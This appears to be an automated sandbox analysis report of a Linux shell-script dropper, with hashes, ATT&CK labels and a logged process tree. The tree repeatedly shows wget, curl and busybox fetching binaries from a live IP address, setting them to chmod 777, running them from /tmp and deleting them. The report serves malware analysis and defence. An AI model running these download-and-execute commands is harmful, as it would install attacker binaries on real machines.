Analysis
- max time kernel: 71s
- max time network: 72s
- platform: debian-9_mipsel
- resource: debian9-mipsel-20240418-en
- resource tags: arch:mipsel, image:debian9-mipsel-20240418-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
- submitted: 25/10/2024, 01:26
Static task
static1
Behavioral task
behavioral1
Sample
3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh
Resource
debian9-mipsel-20240418-en
General
- Target: 3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh
- Size: 10KB
- MD5: 10f1892ae230c88400e80e691b208153
- SHA1: f83482329b6b46cc1ef37aee0eba3b36ef1d7756
- SHA256: 3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01
- SHA512: 7d646519673f50ee4afd8cbd7b42a63c35cd5b58a5d217aa6d9bcb54078a446f27439806aef4602df29f2576bea05e7b0b88a87a7969c96ce8fb3e11ce13172f
- SSDEEP: 192:Omh5SdBY8PQJw8tERk4pw8tE3Yh5SdBiG:Omh5SdBdPQaRk463Yh5SdBX
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Reads runtime system information
description ioc Process
File opened for reading /proc/sys/crypto/fips_enabled curl
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh/tmp/3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh1⤵PID:711
-
/bin/rm/bin/rm bins.sh2⤵PID:715
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵PID:720
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:733
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵PID:739
-
-
/bin/chmodchmod 777 SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z./SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵PID:743
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵PID:744
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵PID:746
-
-
/bin/chmodchmod 777 nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO./nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵
- Executes dropped EXE
PID:748
-
-
/bin/rmrm nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵PID:749
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵PID:750
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵PID:756
-
-
/bin/chmodchmod 777 PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵
- File and Directory Permissions Modification
PID:759
-
-
/tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S./PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵
- Executes dropped EXE
PID:761
-
-
/bin/rmrm PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵PID:763
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵PID:764
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:771
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵PID:778
-
-
/bin/chmodchmod 777 hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵
- File and Directory Permissions Modification
PID:783
-
-
/tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME./hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵
- Executes dropped EXE
PID:784
-
-
/bin/rmrm hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵PID:787
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵PID:788
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:801
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵PID:808
-
-
/bin/chmodchmod 777 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV./8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵PID:812
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵PID:813
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:814
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵PID:815
-
-
/bin/chmodchmod 777 TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵
- File and Directory Permissions Modification
PID:816
-
-
/tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH./TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵
- Executes dropped EXE
PID:817
-
-
/bin/rmrm TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵PID:818
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵PID:819
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:820
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵PID:821
-
-
/bin/chmodchmod 777 fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵
- File and Directory Permissions Modification
PID:838
-
-
/tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal./fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵
- Executes dropped EXE
PID:839
-
-
/bin/rmrm fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵PID:842
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- System Network Configuration Discovery
PID:843
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:850
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- System Network Configuration Discovery
PID:859
-
-
/bin/chmodchmod 777 WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V./WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:862
-
-
/bin/rmrm WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- System Network Configuration Discovery
PID:863
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵PID:864
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:865
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵PID:866
-
-
/bin/chmodchmod 777 Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS./Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵PID:869
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵PID:870
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵PID:872
-
-
/bin/chmodchmod 777 xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm./xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵PID:875
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵PID:876
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵PID:878
-
-
/bin/chmodchmod 777 uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ./uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵PID:881
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵PID:882
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵PID:884
-
-
/bin/chmodchmod 777 sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv./sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵PID:887
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵PID:888
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵PID:890
-
-
/bin/chmodchmod 777 ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8./ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵PID:893
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵PID:894
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵PID:896
-
-
/bin/chmodchmod 777 yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj./yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵PID:899
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵PID:900
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵PID:902
-
-
/bin/chmodchmod 777 xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm./xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵PID:905
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵PID:906
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵PID:908
-
-
/bin/chmodchmod 777 uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ./uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵PID:911
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵PID:912
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵PID:914
-
-
/bin/chmodchmod 777 sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv./sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵PID:917
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵PID:918
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵PID:920
-
-
/bin/chmodchmod 777 ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8./ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵PID:923
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵PID:924
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵PID:926
-
-
/bin/chmodchmod 777 yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj./yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵PID:929
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵PID:930
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵PID:932
-
-
/bin/chmodchmod 777 SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z./SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵PID:935
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵PID:936
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵PID:938
-
-
/bin/chmodchmod 777 nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO./nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵PID:941
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵PID:942
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵PID:944
-
-
/bin/chmodchmod 777 PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S./PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵PID:947
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵PID:948
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵PID:950
-
-
/bin/chmodchmod 777 hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME./hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵PID:953
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵PID:954
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵PID:956
-
-
/bin/chmodchmod 777 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV./8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵PID:959
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵PID:960
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵PID:962
-
-
/bin/chmodchmod 777 TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH./TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵
- Executes dropped EXE
PID:964
-
-
/bin/rmrm TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵PID:965
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵PID:966
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵PID:968
-
-
/bin/chmodchmod 777 fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal./fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵PID:971
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- System Network Configuration Discovery
PID:972
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- System Network Configuration Discovery
PID:974
-
-
/bin/chmodchmod 777 WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V./WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:976
-
-
/bin/rmrm WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- System Network Configuration Discovery
PID:977
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵PID:978
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:979
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵PID:980
-
-
/bin/chmodchmod 777 Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵
- File and Directory Permissions Modification
PID:981
-
-
/tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS./Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵
- Executes dropped EXE
PID:982
-
-
/bin/rmrm Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵PID:983
-
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 153B
- MD5: 998368d7c95ea4293237f2320546e440
- SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
- SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
- SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97